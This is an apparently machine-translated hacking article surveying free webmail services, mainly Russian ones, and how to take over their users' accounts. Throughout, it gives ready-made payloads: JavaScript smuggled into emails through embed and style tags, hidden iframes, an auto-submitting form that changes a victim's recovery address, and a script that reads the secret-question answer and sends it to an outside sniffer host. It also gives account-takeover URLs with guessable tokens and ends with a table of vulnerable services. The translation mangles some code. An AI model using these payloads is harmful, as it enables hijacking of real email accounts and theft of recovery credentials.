This page has been robot translated, sorry for typos if any. Original content here.

APERÇU DES VULNÉRABILITÉS DES SERVICES POSTAUX GRATUITS

Nous continuons à nous engager dans la messagerie Web. J'ai fait une petite recherche sur divers services de piratage informatique et vous en ai présenté les résultats. La technologie d’attaque reste la même: un e-mail avec un code JavaScript déclenché lors de l’ouverture d’une lettre est envoyé à l’adresse d’un tiers et modifie les informations contenues dans les paramètres de la boîte de l’utilisateur. Cela n'a aucun sens de décrire chaque serveur en détail, étant donné que l'approche est la même partout. Je vais donc donner quelques exemples et, à la fin, un tableau. Dans la plupart des cas, le piratage peut être considéré à 100%, avec certaines hypothèses: l’utilisateur doit utiliser l’interface Web pour lire les lettres, tout en écrivant les exploits, j’ai été guidé par une plate-forme standard, c’est-à-dire que je suppose au départ que l’utilisateur n’a Navigateur JS désactivé.

WWW.MAIL.RU

Je commencerai par le poste numéro 1 en Russie. Pour le moment, grâce au passage de JavaScript et à une erreur de développeur, il est possible de déchiffrer cette boîte aux lettres. Je crois que les principes de base sont bien connus. Comment obtenir un mot de passe? 1 - non autorisé le changer. Cela ne fonctionnera pas, vous devez connaître la version précédemment installée. 2 - changez la question secrète et utilisez le service pour combattre l’amnésie. Aussi ne fonctionnera pas. 3 - Configurez votre adresse électronique alternative pour obtenir un nouveau mot de passe généré par le système. Cela ne fonctionne pas, les deux dernières options répertoriées ci-dessus sont sous la même forme et sont également protégées par un mot de passe. Même les autres, qui nous intéressent moins, les paramètres (Nom, prénom, etc.) ne peuvent plus être modifiés sans entrer le mot de passe actuel. Il semblerait qu'il n'y ait pas d'options. Toutefois, la section "Informations de contact" (ICQ, site Web, téléphone, lieu de travail, fuseau horaire, etc.) présente une importance secondaire de ce type. Dans cette section, vous pouvez également spécifier le courrier électronique du contact. Le truc, c’est qu’au même moment dans les informations d’enregistrement, l’adresse de remplacement change, mais celle qui est enregistrée dans le questionnaire permet désormais d’obtenir un mot de passe pour le feuillet via le service de rappel. C'est simple URL: http://win.mail.ru/cgi-bin/anketa?page=2&Email=hacker@antichat.ru Toutefois, la méthode GET ne peut pas modifier les paramètres de la zone mail.ru. Par conséquent, je vais décrire en détail le côté technique du problème.

I. Nous envoyons une lettre avec un code à la case nécessaire avec un code qui générera un cadre directement dans le corps de la lettre avec un lien vers notre site Web. Si possible, le script devrait fonctionner sans aucune interaction de l'utilisateur (clic, clic, souris dessus, chargement d'image, etc.):


 <embed src = "javascript: document.getElementById ('xxx'). innerHTML = '<iframe src = http: //votresite.votredomaine.ru/yourscript.html> </ iframe>'; ceci.wav">
 <p id = 'xxx'>
Afin de garantir pleinement les performances du script, ainsi que le masquage, nous transformons:
 <embed src = "javascript: status = location; document.getElementById ('xxx'). innerHTML = '<iframe src = http: //votresite.ru/votcript.html width = 0 height = 0> </ iframe>' ; this.wav "width = 0 height = 0>
 <p id = 'xxx'>
Sous cette forme, les codes de caractères remplacent les lettres du nom des éléments javascript et iframe, et le script de messagerie ne les filtre pas. Etat de la ligne = emplacement; crée la visibilité d'une URL locale dans la barre d'état, de sorte que le clignotement extérieur ne suscite aucune suspicion. Les attributs width et height, frame et embed, sont mis à zéro et les rendent invisibles.

Ii. Sur la ressource http://votresite.ru, nous plaçons un document HTML avec le formulaire d'envoi des données modifiées au serveur mail.ru.

Contenu yourscript.html:
 <form method = "post" action = "http://win.mail.ru/cgi-bin/anketa" name = "anketa"> <br>
 <input type = "hidden" name = "page" value = "2"> <br>
 <input type = "hidden" name = "Email" value = "hacker@antichat.ru"> <br>
 <input type = "hidden" value = "Save" name = "Save"> <br>
 </ form> <br>
 <script> <br>
 document.anketa.submit (); <br>
 </ script>
Remarques: le travail de la partie client du script sous forme inchangée est garanti uniquement pour IE; Le formulaire d’envoi est placé sur un site séparé spécialement pour «décharger» la lettre.


WWW.MAIL.COM

Maintenant, un bug de sécurité légèrement différent, par exemple, http://mail.com. Si vous utilisez le service de rappel de mot de passe, pour l'obtenir, il suffit d'entrer la bonne réponse à la question secrète (l'une des options). Nous nous sommes donc fixés la tâche d'obtenir cette réponse. Cela se fait facilement. Lorsque je suis allé dans les propriétés de la boîte aux lettres et que j'ai scanné les informations d'enregistrement, j'ai constaté que la réponse à la question secrète n'était pas masquée, ce qui nous permet de lire sa valeur à l'aide de JavaScript.

Introduisez le script à travers la balise style .
Adresse de la page de paramètres: http://mail01.mail.com/scripts/common/genprofile.cgi
Nom du formulaire: profileform
Le nom du champ de texte avec une réponse secrète: hint_a
Par conséquent, pour voler une question secrète, vous devez appeler la page des paramètres, exécuter JavaScript, obtenir la valeur de document.profileform.hint_a.value et la transmettre au renifleur avec la variable d'environnement REQUEST_UR I.

Option Prêt:
 <style> @import url (javascript: document.getElementById ('out'). innerHTML = "<iframe src = http: //mail01.mail.com/scripts/common/genprofile.cgi name = 'zéro'% 6FnLoad = `str = document.zero.profileform.hint_a.value; path = 'http: //zero.h12.ru/stat/capt.php?'; document.zero.location = chemin + str`> </ iframe>" ); </ style>
 <span id = 'out'> </ span>
Dans le cadre généré avec le nom zéro, la page des paramètres est chargée. Une fois le téléchargement terminé, le gestionnaire OnLoad exécute le script pour lire la question secrète, puis, via le même cadre, envoie la réponse au renifleur. Maintenant, allez simplement à http://zero.h12.ru/stat/log.php, et trouvez les informations nécessaires dans la ligne "Host" .

WWW.NEWMAIL.RU

À mon avis, tout à fait un courrier populaire, je vais donc en parler en détail. De plus, il est beaucoup plus facile d’obtenir le compte de quelqu'un d’autre que cela ne semble au premier abord. Pour ce faire, vous pouvez envoyer un courrier électronique avec un script qui, une fois lancé, recevra l’ ID de session , formera les demandes nécessaires et modifiera les paramètres du courrier électronique aléatoire (auquel le mot de passe sera envoyé ultérieurement) ainsi que la question et la réponse secrètes. Toutefois, si vous spécifiez une autre adresse lorsque vous le rappelez, le mot de passe lui sera envoyé si seule la réponse secrète est correcte. Et l'observation suivante: l' id de session pour changer les paramètres ne peut pas être utilisé du tout. De plus, toutes les balises sont autorisées. Tout ce qui précède réduit la quantité de code à quelques lignes:
 <iframe src = http: //newmail.ru/users/chpass.dhtml? cp_msg = 1 & cp_quest = QUESTION & cp_answ = REPONSE width = 0 height = 0> </ iframe> 

WWW.E-MAIL.RU

La méthode de piratage de e-mail.ru ne correspond pas un peu au thème général de l'article, mais quand même - mail :) . Lorsque je devais obtenir un mot de passe d’une boîte aux lettres, j’enregistrais normalement mon compte et commençais à étudier le système. La première chose qui a attiré mon attention a été la possibilité de définir un nouveau mot de passe et une question secrète avec une réponse, sans entrer l'ancien mot de passe. Le plan d’action habituel: vérifier le filtrage des balises, obtenir l’ID et exécuter la demande. Toutefois, pour modifier les paramètres, la variable spéciale utoken a été utilisée, qui est contenue dans le corps du document. Expérimenter avec changer la question et répondre avec l'utoken précédemment connu:
http://www.e-mail.ru/scripts/netauth.dll?cmd=passwd2&show=passwd.tpl&utoken=email@e-mail.ru-5a00&show=passwd.tpl&pass=&repass=&pquestion=ВОПРОС&panswer=ОТВЕТ conclut que l' identifiant et les cookies ne sont pas nécessaires pour modifier les paramètres. Dans le même temps, après avoir observé utoken, il a été constaté que le nombre hexadécimal à quatre chiffres après l'adresse électronique email@e-mail.ru-5a00 se situe dans une plage très étroite. À savoir, pour établir une question secrète avec la réponse sur toute case qui nous intéresse, vous devez passer en revue les 7 options: 5a00 , 5b00 , 5c00 , 5d00 , 5e00 , 5f00 , 6000 . Lorsque le chiffre est deviné, nous entrons dans la bonne case.

Notes: il y a eu quelques changements en ce moment. Le service de récupération de mot de passe ne fonctionne pas, il est donc logique de le changer immédiatement. Les paramètres de changement d'adresse ont également changé:
http://www.e-mail.ru/scripts/netauth.dll?cmd=passwd2&show=passwd.tpl&utoken=email@e-mail.ru-5a00&u_token=email@e-mail.ru-5c00&show=passwd.tpl&pass=&repass=&pquestion=ВОПРОС&panswer=ОТВЕТ La méthode ne fonctionne pas pour toujours. Probablement, il est toujours nécessaire que l'utilisateur aille de temps en temps par courrier électronique via le Web .

Tableau présentant les caractéristiques des serveurs WWW gratuits

SERVEUR Javascript VULNÉRABILITÉ
www.km.ru
km.ru
img src = javascript: Vous permet de lire le mot de passe à partir de la page des paramètres à partir du champ mot de passe
www.mail.ru
inbox.ru , bk.ru , list.ru ,
intégrer src = javascript: Vous pouvez changer le mail alternatif
www.mail.com
email.com , post.com , moi même , consultant.com , etc.
@ import url (javascript :); Les paramètres montrent la réponse à la question secrète.
www.newmail.ru
nm.ru , hotmail.ru , orc.ru , nightmail.ru
De toute façon Lire / modifier la question et la réponse. Le mot de passe est valide
www.netman.ru et www.mailgate.ru
même mailer. environ 80 domaines
img src = javascript :, style = background: url (javascript :) Vous pouvez voler la réponse à une question secrète, si celle-ci est installée. Il est également possible de définir une adresse de transfert (les copies ne sont pas sauvegardées)
www.yandex.ru OnError, OnLoad Suppression du site * .narod.ru (JS n'est pas requis)
www.ukr.net intégrer src = javasc
ript: ce .wav>
Lisez la réponse à votre question secrète.
www.nextmail.ru
xaker.ru , email.su , russian.ru , étudiants.ru , programist.ru , designer.ru , mail2k.ru ,
embed src = "javascript: Échange / vol de réponse à une question secrète
www.hotbox.ru
pochta.ru , pisem.net , fromru.com , land.ru et autres.
À bien des égards Supprimer un compte
www.rin.ru intégrer src = javascript: Lire la réponse secrète